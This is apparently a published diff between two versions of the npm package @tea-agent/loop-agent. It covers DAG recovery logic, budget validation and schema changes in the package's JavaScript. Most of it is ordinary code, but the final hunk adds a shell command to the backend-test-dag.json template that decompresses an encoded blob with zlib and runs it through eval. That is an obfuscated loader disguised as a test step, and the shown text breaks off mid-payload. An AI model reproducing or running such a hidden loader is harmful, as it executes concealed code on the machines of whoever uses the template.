@tea-agent/loop-agent 0.44.0-next.8 → 0.44.0-next.9
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/CHANGELOG.md +97 -0
- package/dist/application/evaluation/budget.js +21 -0
- package/dist/application/evaluation/corpus-hash.js +10 -15
- package/dist/application/evaluation/corpus.js +2 -1
- package/dist/application/evaluation/frontend-browser-acceptance.js +77 -0
- package/dist/application/evaluation/frontend-corpus-browser-acceptance.js +175 -0
- package/dist/application/evaluation/frontend-gateway-evidence.js +226 -0
- package/dist/application/evaluation/frontend-pair-registration.js +143 -0
- package/dist/application/evaluation/frontend-paired-summary.js +150 -0
- package/dist/application/evaluation/frontend-run-observation.js +144 -0
- package/dist/application/evaluation/frontend-shared-evidence.js +105 -0
- package/dist/application/evaluation/types.js +45 -12
- package/dist/application/task-lifecycle/observe.js +26 -1
- package/dist/build-stamp.json +3 -3
- package/dist/cli/command-definitions.js +11 -0
- package/dist/cli/program.js +4 -0
- package/dist/commands/task-advance.js +3 -5
- package/dist/commands/task-source-prepare.js +13 -1
- package/dist/executors/dag-pi/tools/design-terminal-tools.js +17 -7
- package/dist/executors/dag-pi/tools/review-terminal-tools.js +17 -7
- package/dist/executors/dag-pi-executor.js +2048 -125
- package/dist/executors/pi-executor.js +6 -1
- package/dist/executors/pi-sdk-executor.js +76 -11
- package/dist/executors/shell-executor.js +88 -12
- package/dist/infrastructure/console/operation-store.js +2 -0
- package/dist/infrastructure/evaluation/corpus-store.js +37 -12
- package/dist/shared/operator/capabilities.js +10 -5
- package/dist/task/config-types.js +22 -9
- package/dist/task/contract/project.js +13 -0
- package/dist/task/contract/schema.js +2 -8
- package/dist/task/source-prepare/parse-intent.js +124 -5
- package/dist/task/source-prepare/prepare.js +6 -1
- package/dist/task/source-prepare/semantic-intake.js +17 -2
- package/dist/task/source-prepare/source-execution.js +65 -0
- package/dist/task/source-prepare/source-fidelity-pi.js +21 -8
- package/dist/task/source-prepare/source-provider-budget.js +290 -0
- package/dist/worker/console/operator-actions.js +0 -1
- package/dist/worker/console/operator-user-error.js +1 -1
- package/dist/worker/console/prd-intake-bridge.js +5 -15
- package/dist/workflows/dag/budget-enforcement.js +31 -2
- package/dist/workflows/dag/frontend-closeout.js +3 -1
- package/dist/workflows/dag/frontend-contract-facts.js +11 -8
- package/dist/workflows/dag/frontend-design-policy.js +6 -6
- package/dist/workflows/dag/frontend-durable-tools.js +90 -70
- package/dist/workflows/dag/frontend-implementation-contract.js +146 -59
- package/dist/workflows/dag/frontend-plan-canary.js +66 -16
- package/dist/workflows/dag/frontend-plan-decision-contract.js +13 -21
- package/dist/workflows/dag/frontend-plan-progress.js +92 -0
- package/dist/workflows/dag/frontend-recovery-plan.js +11 -10
- package/dist/workflows/dag/frontend-recovery-run.js +51 -46
- package/dist/workflows/dag/frontend-repair-assertions.js +36 -0
- package/dist/workflows/dag/frontend-review-context.js +29 -1
- package/dist/workflows/dag/frontend-review-scopes.js +92 -2
- package/dist/workflows/dag/frontend-risk.js +8 -3
- package/dist/workflows/dag/frontend-root-observation.js +261 -0
- package/dist/workflows/dag/frontend-session-budget.js +52 -39
- package/dist/workflows/dag/frontend-session-context.js +10 -0
- package/dist/workflows/dag/frontend-test-execution-evidence.js +206 -48
- package/dist/workflows/dag/frontend-typed-event-store.js +11 -6
- package/dist/workflows/dag/frontend-verification-trace.js +6 -0
- package/dist/workflows/dag/frontend-writer-admission.js +2 -1
- package/dist/workflows/dag/init-hybrid.js +108 -37
- package/dist/workflows/dag/node-execution.js +11 -11
- package/dist/workflows/dag/rerun-feedback.js +35 -4
- package/dist/workflows/dag/rerun-task.js +62 -67
- package/dist/workflows/dag/runner.js +58 -12
- package/dist/workflows/dag/types.js +15 -8
- package/docs/architecture/runtime-boundaries.md +1 -1
- package/docs/templates/backend-test-dag.json +4 -4
- package/docs/templates/frontend-implementation-contract.schema.json +31 -11
- package/package.json +1 -1
- package/skills/frontend-design-review/SKILL.md +8 -11
- package/skills/frontend-design-review/references/review-checklist.md +3 -4
- package/skills/frontend-review/SKILL.md +5 -1
- package/skills/loop-agent/references/command-reference.md +8 -0
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
import { sha256OfCanonicalJson } from "../../task/contract/hash.js";
|
|
1
2
|
import { access, mkdir, readFile } from "node:fs/promises";
|
|
2
3
|
import { createHash } from "node:crypto";
|
|
3
4
|
import path from "node:path";
|
|
@@ -28,7 +29,7 @@ export function parseDagRerunTaskArgs(args) {
|
|
|
28
29
|
for (let index = 0; index < args.length; index += 1) {
|
|
29
30
|
const arg = args[index];
|
|
30
31
|
if (arg === undefined)
|
|
31
|
-
|
|
32
|
+
throw new Error("dag rerun-task argument is missing");
|
|
32
33
|
if (arg === "--run-id")
|
|
33
34
|
parentRunId = args[++index];
|
|
34
35
|
else if (arg.startsWith("--run-id="))
|
|
@@ -103,6 +104,9 @@ async function readFrontendRecoveryDescriptor(runDir, parentRunId, requestId) {
|
|
|
103
104
|
plan.schemaVersion !== 1 ||
|
|
104
105
|
plan.parentRunId !== parentRunId ||
|
|
105
106
|
plan.requestId !== requestId ||
|
|
107
|
+
plan.failureSource !== raw.failureSource ||
|
|
108
|
+
plan.failureOwner !== raw.failureOwner ||
|
|
109
|
+
plan.resetRootNodeId !== raw.resetRootNodeId ||
|
|
106
110
|
!Array.isArray(plan.resetNodeIds) ||
|
|
107
111
|
!Array.isArray(plan.importedNodeIds)) {
|
|
108
112
|
throw new Error("frontend recovery descriptor is invalid or unbound");
|
|
@@ -126,6 +130,8 @@ function buildFrontendRecoveryIntent(input) {
|
|
|
126
130
|
attemptIndex: input.parentRecovery?.attemptIndex ?? 0,
|
|
127
131
|
continuationCount: input.parentRecovery?.continuationCount ?? 0,
|
|
128
132
|
failureSource: input.failureSource,
|
|
133
|
+
...(input.failureOwner ? { failureOwner: input.failureOwner } : {}),
|
|
134
|
+
...(input.resetRootNodeId ? { resetRootNodeId: input.resetRootNodeId } : {}),
|
|
129
135
|
revision: 0,
|
|
130
136
|
};
|
|
131
137
|
}
|
|
@@ -391,6 +397,8 @@ async function executeFrontendRecoveryContinuation(input) {
|
|
|
391
397
|
parentRunId: input.parentRunId,
|
|
392
398
|
requestId: input.requestId,
|
|
393
399
|
failureSource: descriptor.failureSource,
|
|
400
|
+
failureOwner: descriptor.failureOwner,
|
|
401
|
+
resetRootNodeId: descriptor.resetRootNodeId,
|
|
394
402
|
parentRecovery: parentState.frontendRecoveryState,
|
|
395
403
|
}),
|
|
396
404
|
recoveryPlan: descriptor.plan,
|
|
@@ -404,76 +412,63 @@ async function executeFrontendRecoveryContinuation(input) {
|
|
|
404
412
|
// these through its own durable tools (normal commit entry, child binding)
|
|
405
413
|
// and the model only corrects the rows the design review flagged; the
|
|
406
414
|
// parent ledger is never rewritten and the finalize terminal is not
|
|
407
|
-
// inherited.
|
|
408
|
-
|
|
415
|
+
// inherited. Only an absent parent ledger permits a fresh Plan.
|
|
416
|
+
if (descriptor.plan.resetRootNodeId === "frontend-plan-pi") {
|
|
409
417
|
const parentPlanLedger = path.join(located.runDir, "frontend-plan-pi", "plan-decision-facts.jsonl");
|
|
410
|
-
const parentRaw = await readFile(parentPlanLedger, "utf8")
|
|
411
|
-
|
|
412
|
-
|
|
413
|
-
|
|
414
|
-
|
|
415
|
-
|
|
416
|
-
|
|
417
|
-
|
|
418
|
-
|
|
419
|
-
|
|
420
|
-
|
|
421
|
-
const
|
|
422
|
-
|
|
423
|
-
|
|
424
|
-
|
|
425
|
-
bucket.push(entry);
|
|
426
|
-
byKind.set(kind, bucket);
|
|
427
|
-
}
|
|
428
|
-
let parentCanonicalSha256;
|
|
429
|
-
try {
|
|
430
|
-
const parentCanonical = await readFile(path.join(located.runDir, "contracts", "frontend-implementation-contract.json"), "utf8");
|
|
431
|
-
parentCanonicalSha256 = createHash("sha256").update(parentCanonical).digest("hex");
|
|
432
|
-
}
|
|
433
|
-
catch {
|
|
434
|
-
// Parent canonical unavailable → the identical-plan guard is skipped.
|
|
435
|
-
}
|
|
436
|
-
// Carry the design findings that blocked the parent run: the child's
|
|
437
|
-
// finalize runs a per-finding closure check against them.
|
|
438
|
-
let designFindings = [];
|
|
439
|
-
try {
|
|
440
|
-
const designFacts = await readTypedEventStoreFromJsonl(path.join(located.runDir, "frontend-design-review-pi", "design-typed-facts.jsonl"));
|
|
441
|
-
for (const record of designFacts) {
|
|
442
|
-
const fact = record.fact;
|
|
443
|
-
if (record.phase !== "committed" || fact.kind !== "design-finding")
|
|
418
|
+
const parentRaw = await readFile(parentPlanLedger, "utf8").catch((error) => {
|
|
419
|
+
if (error.code === "ENOENT")
|
|
420
|
+
return undefined;
|
|
421
|
+
throw error;
|
|
422
|
+
});
|
|
423
|
+
if (parentRaw !== undefined) {
|
|
424
|
+
const parentRecords = await readTypedEventStoreFromJsonl(parentPlanLedger);
|
|
425
|
+
// Collapse superseded records first: the parent ledger is append-only
|
|
426
|
+
// (replace:true appends a corrected row), and replaying both the original
|
|
427
|
+
// and its correction would trip FACT_IDENTITY_CONFLICT in the child.
|
|
428
|
+
const { collapseDecisionEntriesByKind } = await import("./frontend-plan-decision-contract.js");
|
|
429
|
+
const byKind = new Map();
|
|
430
|
+
for (const record of parentRecords) {
|
|
431
|
+
const kind = String(record.fact.kind);
|
|
432
|
+
if (record.phase !== "committed" || kind === "finalize_decision")
|
|
444
433
|
continue;
|
|
445
|
-
const
|
|
446
|
-
|
|
447
|
-
|
|
448
|
-
|
|
449
|
-
|
|
450
|
-
|
|
451
|
-
});
|
|
434
|
+
const entry = record.fact.entry;
|
|
435
|
+
if (typeof entry !== "object" || entry === null || Array.isArray(entry))
|
|
436
|
+
continue;
|
|
437
|
+
const bucket = byKind.get(kind) ?? [];
|
|
438
|
+
bucket.push(entry);
|
|
439
|
+
byKind.set(kind, bucket);
|
|
452
440
|
}
|
|
441
|
+
let parentCanonicalSha256;
|
|
442
|
+
try {
|
|
443
|
+
const parentCanonical = await readFile(path.join(located.runDir, "contracts", "frontend-implementation-contract.json"), "utf8");
|
|
444
|
+
parentCanonicalSha256 = createHash("sha256").update(parentCanonical).digest("hex");
|
|
445
|
+
}
|
|
446
|
+
catch {
|
|
447
|
+
// Parent canonical unavailable → the identical-plan guard is skipped.
|
|
448
|
+
}
|
|
449
|
+
const { readCurrentFrontendRepairFindings } = await import("./rerun-feedback.js");
|
|
450
|
+
const feedback = await readCurrentFrontendRepairFindings(located.runDir);
|
|
451
|
+
const designFindings = feedback?.verdict === "request" ? feedback.findings : [];
|
|
452
|
+
const parentSpec = await readDagRunSpec(located.runDir);
|
|
453
|
+
const snapshot = {
|
|
454
|
+
schemaVersion: 1,
|
|
455
|
+
schemaId: "frontend-plan-parent-decision-snapshot-v1",
|
|
456
|
+
parentRunId: input.parentRunId,
|
|
457
|
+
parentLedgerSha256: createHash("sha256").update(parentRaw).digest("hex"),
|
|
458
|
+
sourceBindingSha256: sha256OfCanonicalJson(parentSpec.sourceBinding ?? null),
|
|
459
|
+
...(feedback ? { feedbackBinding: { sourceNodeId: feedback.sourceNodeId, ledgerSha256: feedback.ledgerSha256, terminalEventId: feedback.terminalEventId } } : {}),
|
|
460
|
+
...(parentCanonicalSha256 ? { parentCanonicalSha256 } : {}),
|
|
461
|
+
designFindings,
|
|
462
|
+
facts: [...byKind.entries()].flatMap(([kind, entries]) => collapseDecisionEntriesByKind(kind, entries).map((entry) => ({
|
|
463
|
+
kind,
|
|
464
|
+
entry,
|
|
465
|
+
}))),
|
|
466
|
+
};
|
|
467
|
+
await mkdir(path.join(locatedChild.runDir, "frontend-plan-pi"), {
|
|
468
|
+
recursive: true,
|
|
469
|
+
});
|
|
470
|
+
await writeJsonAtomic(path.join(locatedChild.runDir, "frontend-plan-pi", "parent-decision-snapshot.json"), snapshot);
|
|
453
471
|
}
|
|
454
|
-
catch {
|
|
455
|
-
// No readable design findings → the closure check has no assertions.
|
|
456
|
-
}
|
|
457
|
-
const snapshot = {
|
|
458
|
-
schemaVersion: 1,
|
|
459
|
-
schemaId: "frontend-plan-parent-decision-snapshot-v1",
|
|
460
|
-
parentRunId: input.parentRunId,
|
|
461
|
-
parentLedgerSha256: createHash("sha256").update(parentRaw).digest("hex"),
|
|
462
|
-
...(parentCanonicalSha256 ? { parentCanonicalSha256 } : {}),
|
|
463
|
-
designFindings,
|
|
464
|
-
facts: [...byKind.entries()].flatMap(([kind, entries]) => collapseDecisionEntriesByKind(kind, entries).map((entry) => ({
|
|
465
|
-
kind,
|
|
466
|
-
entry,
|
|
467
|
-
}))),
|
|
468
|
-
};
|
|
469
|
-
await mkdir(path.join(locatedChild.runDir, "frontend-plan-pi"), {
|
|
470
|
-
recursive: true,
|
|
471
|
-
});
|
|
472
|
-
await writeJsonAtomic(path.join(locatedChild.runDir, "frontend-plan-pi", "parent-decision-snapshot.json"), snapshot);
|
|
473
|
-
}
|
|
474
|
-
catch {
|
|
475
|
-
// No parent plan ledger (or unreadable) → the child plans fresh,
|
|
476
|
-
// exactly like a run without recovery lineage.
|
|
477
472
|
}
|
|
478
473
|
const childSpec = await readDagRunSpec(locatedChild.runDir);
|
|
479
474
|
const childState = await readDagRunState(locatedChild.runDir);
|
|
@@ -1,3 +1,7 @@
|
|
|
1
|
+
import { assertFrontendPairExecution } from "../../application/evaluation/frontend-pair-registration.js";
|
|
2
|
+
import { sourceBudgetContractIdentity } from "../../application/evaluation/budget.js";
|
|
3
|
+
import { summarizeFrozenSourceUsage } from "../../task/source-prepare/source-provider-budget.js";
|
|
4
|
+
import { sha256OfCanonicalJson } from "../../task/contract/hash.js";
|
|
1
5
|
import { readdir, readFile } from "node:fs/promises";
|
|
2
6
|
import { createHash } from "node:crypto";
|
|
3
7
|
import { writeJsonAtomic } from "../../infrastructure/harness/atomic-write.js";
|
|
@@ -244,6 +248,17 @@ export function createInitialRunState(spec, opts, ranks, runId = opts.runId ?? "
|
|
|
244
248
|
: {}),
|
|
245
249
|
};
|
|
246
250
|
initRunBudgetLedger(state, spec.budget);
|
|
251
|
+
if (spec.sourceProviderBudget) {
|
|
252
|
+
if (sha256OfCanonicalJson(spec.sourceProviderBudget.contract ?? null) !== sha256OfCanonicalJson(sourceBudgetContractIdentity(spec.taskContractBinding) ?? null) || !state.budgetLedger || spec.sourceProviderBudget.ledger.taskId !== spec.sourceBinding?.taskId || spec.sourceProviderBudget.ledger.maxProviderRequests !== state.budgetLedger.limits.maxProviderRequests || spec.sourceProviderBudget.sourceBindingSha256 !== sha256OfCanonicalJson(spec.sourceBinding))
|
|
253
|
+
throw Error("FRONTEND_PROVIDER_BUDGET_INVALID: source snapshot does not match DAG");
|
|
254
|
+
state.sourceProviderBudget = structuredClone(spec.sourceProviderBudget);
|
|
255
|
+
state.budgetLedger.consumed.providerRequests = spec.sourceProviderBudget.ledger.reservedRequests;
|
|
256
|
+
const sourceUsage = summarizeFrozenSourceUsage(spec.sourceProviderBudget);
|
|
257
|
+
if (sourceUsage.complete)
|
|
258
|
+
state.budgetLedger.consumed.tokens = sourceUsage.totalTokens;
|
|
259
|
+
else if (spec.sourceProviderBudget.ledger.reservedRequests > 0)
|
|
260
|
+
state.budgetLedger.consumed.missingTokenNodeIds.push(`task-budget:${spec.sourceProviderBudget.ledger.budgetId}`);
|
|
261
|
+
}
|
|
247
262
|
return state;
|
|
248
263
|
}
|
|
249
264
|
export function assertFrozenEvaluationBinding(spec, state) {
|
|
@@ -280,6 +295,12 @@ export async function runDag(spec, opts) {
|
|
|
280
295
|
if (!runningIdentity) {
|
|
281
296
|
throw new Error("running controller identity could not be resolved; refuse to create an unpinned DAG run");
|
|
282
297
|
}
|
|
298
|
+
if (spec.evaluation?.frontendPair)
|
|
299
|
+
await assertFrontendPairExecution({
|
|
300
|
+
repoRoot: opts.cwd, binding: spec.evaluation,
|
|
301
|
+
controllerFingerprint: runningIdentity.packageFingerprint.value,
|
|
302
|
+
startedAt: new Date().toISOString(),
|
|
303
|
+
});
|
|
283
304
|
assertRuntimeContractCompatible(spec, {
|
|
284
305
|
...DAG_CONTROLLER_CAPABILITIES,
|
|
285
306
|
controllerVersion: runningIdentity.packageVersion,
|
|
@@ -453,6 +474,12 @@ export async function resumeDagRun(opts) {
|
|
|
453
474
|
if (!runningIdentity) {
|
|
454
475
|
throw new Error("running controller identity could not be resolved; refuse to resume an unpinned DAG run");
|
|
455
476
|
}
|
|
477
|
+
if (spec.evaluation?.frontendPair)
|
|
478
|
+
await assertFrontendPairExecution({
|
|
479
|
+
repoRoot: opts.cwd, binding: spec.evaluation,
|
|
480
|
+
controllerFingerprint: runningIdentity.packageFingerprint.value,
|
|
481
|
+
startedAt: state.startedAt,
|
|
482
|
+
});
|
|
456
483
|
assertRuntimeContractCompatible(spec, {
|
|
457
484
|
...DAG_CONTROLLER_CAPABILITIES,
|
|
458
485
|
controllerVersion: runningIdentity.packageVersion,
|
|
@@ -602,8 +629,12 @@ async function executeDagCheckpoint(input) {
|
|
|
602
629
|
};
|
|
603
630
|
const onSigTerm = () => shutdownOnSignal("SIGTERM");
|
|
604
631
|
const onSigInt = () => shutdownOnSignal("SIGINT");
|
|
605
|
-
|
|
606
|
-
|
|
632
|
+
// Keep listeners installed until persistence completes. Pi dependencies use
|
|
633
|
+
// signal-exit, which recounts listeners during signal dispatch and re-sends
|
|
634
|
+
// the signal if a once-listener has already removed itself. terminalSignal
|
|
635
|
+
// above makes repeated signals idempotent; normal cleanup removes listeners.
|
|
636
|
+
process.on("SIGTERM", onSigTerm);
|
|
637
|
+
process.on("SIGINT", onSigInt);
|
|
607
638
|
// Exit-time diagnostics (silent-death forensics): write an `armed` line at
|
|
608
639
|
// checkpoint start and append process-exit / uncaught-exception /
|
|
609
640
|
// unhandled-rejection lines with a live state snapshot so an abnormal death
|
|
@@ -862,7 +893,12 @@ async function executeDagCheckpoint(input) {
|
|
|
862
893
|
trigger: recoveryTrigger,
|
|
863
894
|
deps: input.recovery,
|
|
864
895
|
});
|
|
865
|
-
if (created.kind === "
|
|
896
|
+
if (created.kind === "blocked") {
|
|
897
|
+
state.status = "failed";
|
|
898
|
+
state.terminalReason = created.reason;
|
|
899
|
+
state.frontendRecoveryResult = buildRecoveryResultForTrigger(state, recoveryTrigger, "auto-recovery-blocked");
|
|
900
|
+
}
|
|
901
|
+
else if (created.kind === "conflict") {
|
|
866
902
|
// Same clientRequestId with a different payload → fail closed; never
|
|
867
903
|
// create a second recovery operation (AC-004).
|
|
868
904
|
state.status = "failed";
|
|
@@ -1276,7 +1312,7 @@ export async function finalizeTerminalRunStatus(state, taskCount, runDir, cwd, f
|
|
|
1276
1312
|
// The rejected design is a plan input defect. Reset from the
|
|
1277
1313
|
// planner so the next child can incorporate the committed
|
|
1278
1314
|
// findings before design review runs again.
|
|
1279
|
-
failureSource: "frontend-
|
|
1315
|
+
failureSource: "frontend-design-review-pi",
|
|
1280
1316
|
failureOwner: classifyReviewIssueCategoryFailureOwner(designRequestFact.issueCategory),
|
|
1281
1317
|
protocolFailureReason: `frontend design review request_design_changes (issueCategory=${designRequestFact.issueCategory})`,
|
|
1282
1318
|
recoveryMode: "new-dag",
|
|
@@ -1477,6 +1513,20 @@ export async function finalizeTerminalRunStatus(state, taskCount, runDir, cwd, f
|
|
|
1477
1513
|
*/
|
|
1478
1514
|
async function createRecoveryOperation(input) {
|
|
1479
1515
|
const { cwd, runDir, spec, state, trigger } = input;
|
|
1516
|
+
const { computeFrontendRecoveryPlanForSource } = await import("./frontend-recovery-plan.js");
|
|
1517
|
+
let plan;
|
|
1518
|
+
try {
|
|
1519
|
+
plan = computeFrontendRecoveryPlanForSource({
|
|
1520
|
+
spec,
|
|
1521
|
+
parentRunId: state.runId,
|
|
1522
|
+
requestId: trigger.requestId,
|
|
1523
|
+
failureSource: trigger.failureSource,
|
|
1524
|
+
failureOwner: trigger.failureOwner,
|
|
1525
|
+
});
|
|
1526
|
+
}
|
|
1527
|
+
catch (error) {
|
|
1528
|
+
return { kind: "blocked", reason: error instanceof Error ? error.message : String(error) };
|
|
1529
|
+
}
|
|
1480
1530
|
const recoveryLease = await acquireDagRecoveryLease({
|
|
1481
1531
|
cwd,
|
|
1482
1532
|
parentRunId: state.runId,
|
|
@@ -1502,13 +1552,6 @@ async function createRecoveryOperation(input) {
|
|
|
1502
1552
|
observeOnly = true;
|
|
1503
1553
|
}
|
|
1504
1554
|
}
|
|
1505
|
-
const { computeFrontendRecoveryPlanForSource } = await import("./frontend-recovery-plan.js");
|
|
1506
|
-
const plan = computeFrontendRecoveryPlanForSource({
|
|
1507
|
-
spec,
|
|
1508
|
-
parentRunId: state.runId,
|
|
1509
|
-
requestId: trigger.requestId,
|
|
1510
|
-
failureSource: trigger.failureSource,
|
|
1511
|
-
});
|
|
1512
1555
|
const planHash = createHash("sha256")
|
|
1513
1556
|
.update(JSON.stringify(plan))
|
|
1514
1557
|
.digest("hex");
|
|
@@ -1518,6 +1561,8 @@ async function createRecoveryOperation(input) {
|
|
|
1518
1561
|
parentRunId: state.runId,
|
|
1519
1562
|
requestId: trigger.requestId,
|
|
1520
1563
|
failureSource: trigger.failureSource,
|
|
1564
|
+
failureOwner: plan.failureOwner,
|
|
1565
|
+
resetRootNodeId: plan.resetRootNodeId,
|
|
1521
1566
|
recoveryMode: trigger.recoveryMode,
|
|
1522
1567
|
planHash,
|
|
1523
1568
|
plan,
|
|
@@ -1529,7 +1574,8 @@ async function createRecoveryOperation(input) {
|
|
|
1529
1574
|
parentRunId: state.runId,
|
|
1530
1575
|
requestId: trigger.requestId,
|
|
1531
1576
|
failureSource: trigger.failureSource,
|
|
1532
|
-
failureOwner:
|
|
1577
|
+
failureOwner: plan.failureOwner,
|
|
1578
|
+
resetRootNodeId: plan.resetRootNodeId,
|
|
1533
1579
|
protocolFailureReason: trigger.protocolFailureReason,
|
|
1534
1580
|
recoveryMode: trigger.recoveryMode,
|
|
1535
1581
|
planHash,
|
|
@@ -1,7 +1,12 @@
|
|
|
1
|
+
import { frontendPairExecutionBindingSchema } from "../../application/evaluation/frontend-pair-registration.js";
|
|
2
|
+
import { sourceBudgetContractIdentity } from "../../application/evaluation/budget.js";
|
|
3
|
+
import { sha256OfCanonicalJson } from "../../task/contract/hash.js";
|
|
4
|
+
import { frontendTestObservationSchema } from "./frontend-test-execution-evidence.js";
|
|
5
|
+
import { capabilityBoundarySchema } from "../../task/config-types.js";
|
|
1
6
|
import { z } from "zod";
|
|
2
7
|
import { frontendExecutionPolicySchema } from "../../shared/frontend-execution-policy.js";
|
|
3
8
|
import { DEFAULT_FRONTEND_SPEC_ROOTS, isFrontendSpecFilePath, isValidFrontendSpecRoot, OPENSPEC_SPEC_EXT_RE, } from "../../shared/openspec-spec.js";
|
|
4
|
-
import { campaignBudgetSchema, } from "../../application/evaluation/budget.js";
|
|
9
|
+
import { campaignBudgetSchema, sourceProviderBudgetBindingSchema, } from "../../application/evaluation/budget.js";
|
|
5
10
|
import { assertDagPromptSourceRule } from "./prompt-source.js";
|
|
6
11
|
// Leaf-module import: dagRetryPolicySchema must be defined by a module that
|
|
7
12
|
// never transitively reaches types.ts during init (retry-policy does, via
|
|
@@ -89,6 +94,7 @@ export const dagShellVerifyEvidenceSchema = z.object({
|
|
|
89
94
|
.array(z.object({
|
|
90
95
|
label: z.string(),
|
|
91
96
|
status: z.enum(["ok", "future-delivery-script", "future-test-target"]),
|
|
97
|
+
testObservation: frontendTestObservationSchema.optional(),
|
|
92
98
|
}))
|
|
93
99
|
.default([]),
|
|
94
100
|
/** Effective timeout applied independently to each shell command. */
|
|
@@ -463,13 +469,7 @@ export const dagFrontendDesignPolicySchema = z
|
|
|
463
469
|
.optional(),
|
|
464
470
|
/** Generation-frozen test capability boundary composed into the
|
|
465
471
|
* canonical dependencyPolicy by the runtime. */
|
|
466
|
-
capabilityBoundary:
|
|
467
|
-
.object({
|
|
468
|
-
allowed: z.array(z.string().min(1)).optional(),
|
|
469
|
-
forbidden: z.array(z.string().min(1)).optional(),
|
|
470
|
-
})
|
|
471
|
-
.strict()
|
|
472
|
-
.optional(),
|
|
472
|
+
capabilityBoundary: capabilityBoundarySchema.optional(),
|
|
473
473
|
/** Generation-frozen interaction id vocabulary (plan finalize check). */
|
|
474
474
|
interactionIds: z.array(z.string().min(1)).optional(),
|
|
475
475
|
/** Generation-frozen roots that bound custom normative directories. */
|
|
@@ -1320,6 +1320,7 @@ export const dagEvaluationBindingSchema = z
|
|
|
1320
1320
|
seed: z.number().int().nonnegative(),
|
|
1321
1321
|
split: z.enum(["public", "private", "held_out"]).optional(),
|
|
1322
1322
|
taskRef: z.string().min(1).optional(),
|
|
1323
|
+
frontendPair: frontendPairExecutionBindingSchema.optional(),
|
|
1323
1324
|
})
|
|
1324
1325
|
.strict();
|
|
1325
1326
|
/** Eval Lab Campaign Budget (W3.4); enforced by runner ledger when mode=hard. */
|
|
@@ -1424,6 +1425,7 @@ export const dagSpecSchema = z
|
|
|
1424
1425
|
evaluation: dagEvaluationBindingSchema.optional(),
|
|
1425
1426
|
/** Optional hard/record-only budget; requires version 3 or 4. */
|
|
1426
1427
|
budget: dagBudgetSchema.optional(),
|
|
1428
|
+
sourceProviderBudget: sourceProviderBudgetBindingSchema.optional(),
|
|
1427
1429
|
frontendExecutionPolicy: frontendExecutionPolicySchema.optional(),
|
|
1428
1430
|
sourceBinding: dagSourceBindingSchema.optional(),
|
|
1429
1431
|
/** v4 managed Task Contract binding; only valid on version 4. */
|
|
@@ -1494,6 +1496,9 @@ export const dagSpecSchema = z
|
|
|
1494
1496
|
tasks: z.array(dagTaskSchema).min(1),
|
|
1495
1497
|
})
|
|
1496
1498
|
.superRefine((spec, ctx) => {
|
|
1499
|
+
if (spec.sourceProviderBudget && (!spec.sourceBinding || spec.sourceProviderBudget.ledger.taskId !== spec.sourceBinding.taskId || sha256OfCanonicalJson(spec.sourceProviderBudget.contract ?? null) !== sha256OfCanonicalJson(sourceBudgetContractIdentity(spec.taskContractBinding) ?? null) || spec.budget?.mode !== "hard" || spec.sourceProviderBudget.ledger.maxProviderRequests !== spec.budget?.limits.maxProviderRequests || spec.sourceProviderBudget.sourceBindingSha256 !== sha256OfCanonicalJson(spec.sourceBinding))) {
|
|
1500
|
+
ctx.addIssue({ code: z.ZodIssueCode.custom, path: ["sourceProviderBudget"], message: "source request budget must match the frozen source and request limit" });
|
|
1501
|
+
}
|
|
1497
1502
|
const supportsV3Fields = spec.version === 3 || spec.version === 4;
|
|
1498
1503
|
validateFrozenArtifactBindings(spec.tasks, ctx);
|
|
1499
1504
|
if (spec.evaluation && !supportsV3Fields) {
|
|
@@ -1618,6 +1623,8 @@ export const frontendRecoveryStateSchema = z
|
|
|
1618
1623
|
* frontend-plan-revision-pi / frontend-prewrite-gate-shell /
|
|
1619
1624
|
* frontend-implement-pi (writer partial write). */
|
|
1620
1625
|
failureSource: z.string().min(1).optional(),
|
|
1626
|
+
failureOwner: z.enum(["contract", "scout", "plan", "implementation", "verification-config", "environment", "scope", "unknown"]).optional(),
|
|
1627
|
+
resetRootNodeId: z.string().min(1).optional(),
|
|
1621
1628
|
revision: z.number().int().nonnegative(),
|
|
1622
1629
|
})
|
|
1623
1630
|
.strict()
|
|
@@ -180,7 +180,7 @@ Runner / Loop ──(迁移中)──> 逐步改为仅经 Store / Appli
|
|
|
180
180
|
| Script | 检查内容 | 失败条件 |
|
|
181
181
|
| -------- | ---------- | ---------- |
|
|
182
182
|
| `scripts/check-architecture-boundaries.sh` | workflow/executor forbidden import,及 Worker → CLI/commands/application import | 新的未 allowlist violation |
|
|
183
|
-
| `scripts/check-command-registry-drift.sh` |
|
|
183
|
+
| `scripts/check-command-registry-drift.sh` | 五处真源的 top-level command 一致性:`src/cli/command-definitions.ts`(权威)、`src/shared/operator/capabilities.ts` 覆盖表、`skills/loop-agent/references/command-reference.md`、`website/docs/reference/cli.md`、`test/cli-contract.test.ts` 的 `LEGACY_SUPPORTED_COMMANDS`(逐项且同序) | 任一真源引用未注册 command、未覆盖已注册 command,或契约测试清单与 registry 不一致 |
|
|
184
184
|
| `scripts/check-exec-plan-index-sync.sh` | `ai_workspace/loop-agent/exec-plans/{active,completed}` 目录文件 vs 对应 `README.md` 索引 | 任一 plan 文件未在索引登记 |
|
|
185
185
|
| `scripts/check-skill-entry.sh` | `loop-agent` / `agent-worker` 的 frontmatter、required references、入口行数与 operator trigger vocabulary | 任一公共 skill 缺失、reference/trigger 漂移或入口超过 hard limit |
|
|
186
186
|
|
|
@@ -197,7 +197,7 @@
|
|
|
197
197
|
"writePolicy": "read-only",
|
|
198
198
|
"shell": {
|
|
199
199
|
"commands": [
|
|
200
|
-
"node -e \"eval(require('zlib').inflateRawSync(Buffer.from('
|
|
200
|
+
